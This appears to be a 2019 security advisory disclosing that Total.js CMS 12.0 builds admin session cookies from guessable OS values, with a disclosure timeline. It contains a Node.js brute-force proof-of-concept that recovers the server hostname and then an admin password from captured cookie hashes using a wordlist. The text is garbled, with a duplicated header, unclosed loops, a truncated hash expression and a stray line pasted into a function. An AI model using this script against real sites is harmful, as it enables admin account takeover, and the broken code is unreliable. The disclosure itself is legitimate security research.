[+] Author/Discoverer: Riccardo Krauter @CertimeterGroup

[+] Title: Totaljs CMS Insecure Admin Session cookie

[+] Affected software: Totaljs CMS 12.0< [+] Author/Discoverer: Riccardo Krauter @CertimeterGroup

[+] Title: Totaljs CMS Insecure Admin Session cookie

[+] Affected software: Totaljs CMS 12.0

[+] Description:

A low privilege user can easily crack the owned cookie to obtain the
“random” values inside it. If this user can leak a session cookie owned
by another admin, then it’s possible to brute force it with O(n)=2n
instead of O(n)=n^x complexity and steal the admin password. In such way
he break the admin password.

[+] Step to reproduce:

In the file schemas/settings.js
we have that the value for the session cookie is equivalent as:

var key = (user.login + ':' + user.password + ':' + F.config.secret +
string_hash(user.login + ':' + user.password).hash()).md5();

Os = require(“os”);
F.config.secret = (Os.hostname()'-' + Os.platform() + '-' + Os.arch() +
'-' + Os.release() + '-' + Os.tmpdir());

and string_hash() is a custom function.

All of this Os variables are easily guessable or brute-forceable.
An attacker can enumerate the machine server with nmap scan to evaluate
the architecture behind (linux, windows...) in this way he escape the
randomness for Os.platform() parameter.
The Os.arch() parameter can be ‘x32’ or ‘x64’, then not so much random
in it.
The Os.release() can be easily listed because are common and public
(e.g. 4.15.0-45-generic), also it will be influenced from the recon of
the Os.platform() in such way if the attacker enumerated a linux machine
he can use a list of all linux version.
The Os.tmpdir() param is totally guessable. For example in linux systems
is /tmp by default.
The Os.hostname() is probably the more random parameter here but a
dictionary based attack can be efficacious to retrieve it.

[+] POC Script:

// cookie_brute.js

var Os = require('os');

var crypto = require('crypto');

var lineByLine = require('n-readlines');

function string_hash(s, convert) {

var hash = 0;

if (s.length === 0)

return convert ? '' : hash;

for (var i = 0, l = s.length; i < l; i++) {

var char = s.charCodeAt(i);

hash = ((hash << 5) - hash) + char;

hash |= 0;



return hash;



schemas/settings.js: var key = (user.login + ':' + user.password + ':' +
F.config.secret + (user.login + ':' + user.password).hash()).md5();


//brute forcing the hostname

var liner2 = new lineByLine('/usr/share/wordlists/darkc0de.txt');

var hostname;

owned_passwd = "paw";

var name = "paw";

user_cookie = "b5268788942f8c6057ce83aa98cef85e";

while (hostname = liner2.next()) {

var secret = (hostname + '-' + Os.platform() + '-' + Os.arch() + '-' +
Os.release() + '-' + Os.tmpdir());

secret = crypto.createHash('md5').update(secret).digest("hex");

var h = (name + ':' + owned_passwd + ':' + secret + string_hash(name +
':' + owned_passwd));

h = crypto.createHash('md5').update(h).digest("hex");

if(user_cookie === h){

console.log('[+] Match found with user:password:hostname: ', name + ":"
+ owned_passwd + ":" + hostname);




//bruteforcing the password

admin_cookie = "d3316f9bd135906890fbc36d858304a5";

var liner = new lineByLine('/usr/share/wordlists/darkc0de.txt');

var name = "admin";

var secret = (hostname + '-' + Os.platform() + '-' + Os.arch() + '-' +
Os.release() + '-' + Os.tmpdir());

secret = crypto.createHash('md5').update(secret).digest("hex");

while (password = liner.next()) {

var h = (name + ':' + password + ':' + secret + string_hash(name + ':' +

h = crypto.createHash('md5').update(h).digest("hex");

if( admin_cookie === h){

console.log('[+] Match found with user:password:hostname: ', name + ":"
+ password + ":" + hostname);




[+] Project link: https://github.com/totaljs/cms

[+] Original report and details:

[+] Timeline:

- 13/02/2019 -> reported the issue to the vendor

.... many ping here

- 18/06/2019 -> pinged the vendor last time

- 30/08/2019 -> reported to seclist